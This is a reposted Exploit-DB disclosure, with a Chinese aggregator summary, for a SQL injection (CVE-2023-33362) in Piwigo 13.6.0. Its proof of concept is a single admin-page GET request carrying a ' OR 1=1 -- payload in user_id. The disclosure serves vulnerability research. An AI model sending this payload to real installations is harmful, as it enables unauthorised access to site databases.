[webapps] Piwigo 13.6.0 - SQL Injection
Piwigo 13.6.0 存在 SQL 注入漏洞(CVE-2023-33362),攻击者可通过构造特定请求利用该漏洞进行攻击。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
Piwigo 13.6.0 存在 SQL 注入漏洞(CVE-2023-33362),攻击者可通过构造特定请求利用该漏洞进行攻击。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0
# Tested on: Windows
# CVE : CVE-2023-33362
Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1
Host: piwigo
Steps to Reproduce
Login as an admin user.
Send the request.
Observe the result
文章来源: https://www.exploit-db.com/exploits/52443
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh